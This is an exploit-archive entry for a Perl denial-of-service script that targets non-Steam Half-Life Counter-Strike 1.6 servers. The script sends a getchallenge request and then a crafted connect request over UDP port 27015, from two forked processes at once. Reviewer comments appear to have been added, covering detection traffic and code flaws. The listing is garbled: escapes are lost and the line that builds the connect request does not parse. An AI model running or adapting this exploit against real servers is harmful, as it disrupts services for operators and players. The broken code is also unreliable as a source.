
# Title : Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit
# Published : 2006-02-11
# Author : Firestorm


#!/usr/bin/perl
# Server must not be running steam. /str0ke


# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows built-in server, cstrike 1.6 linux dedicated server
use IO::Socket;
# Driver: require a target host argument, then run econnect() from two
# processes at once (the parent and a forked child).
# The original tested fork()'s return value but called econnect($host) in
# both branches, so the value (child pid, 0, or undef on failure) does not
# change what runs; if fork fails, the single remaining process still makes
# one call. For a defender this means one invocation normally produces two
# near-simultaneous UDP exchanges from the same source host.
$ARGV[0] or die "usage: ./csdos <host>";

# $host is an undeclared package global, as in the original (no strict).
$host = $ARGV[0];

fork();
econnect($host);

exit;

# econnect(HOST): run one getchallenge/connect exchange against HOST over UDP.
#
# Opens a UDP socket to HOST port 27015, sends a "getchallenge" request,
# takes the second space-separated field of the reply as the challenge value,
# then sends a "connect 47 <challenge> ..." request and prints both replies.
# Dies if the socket cannot be created.
#
# Scope, per the page header: reported against Half-Life CSTRIKE servers
# <= 1.6 that are not running Steam. The page does not say which part of the
# connect request the server mishandles, so the root cause is not documented.
#
# Detection view: the only traffic generated here is two UDP datagrams to
# port 27015 -- a getchallenge request followed by a connect request -- with
# the socket held open for three seconds afterwards.
#
# NOTE(review): the string literals in this listing appear to have lost their
# backslash escapes in extraction ("n" where a newline escape is expected,
# "xff..." where byte escapes are expected), and the line that builds $q does
# not parse as shown.
# NOTE(review): the ($) prototype has no effect on the calls earlier in the
# file, because they are compiled before this definition is seen.
# NOTE(review): $cmd, $b, @c, $c2 and $q are undeclared package globals (the
# script does not enable strict); $b is also one of sort's special variables.
sub econnect($)
{
        my $host=$_[0];
        my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
        die "Could not create socket: $!n" unless $sock;
        # Prefix put in front of both requests (presumably a 4-byte 0xFF
        # packet header whose escapes were lost -- confirm against the original).
        $cmd="xffxffxffxff";
        # First datagram: ask the server for a challenge value.
        syswrite $sock, $cmd."getchallenge";

        # Read the reply (up to 65535 bytes) and echo it. No timeout is set,
        # so this waits for as long as the server does not answer; the
        # return values of syswrite/sysread are never checked.
        sysread $sock,$b,65535;  print $b,"n";
        # Split the reply on single spaces.
        @c=split(/ /,$b);

        # The second field is used as the challenge; it is not validated and
        # is undefined if the reply contained no space.
        $c2=$c[1];

        # Second datagram: a connect request carrying the literal 47
        # (presumably the protocol version), the challenge, and a
        # backslash-delimited key/value string.
        $q=$cmd."connect 47 $c2 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a36258af1bb64ed866538c9db76""\"";
# Echo the outgoing request, send it, then read and echo the server's answer.
print '>',$q,"n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"n";
# Keep the socket open for three seconds before closing it.
sleep 3;
close $sock;
}
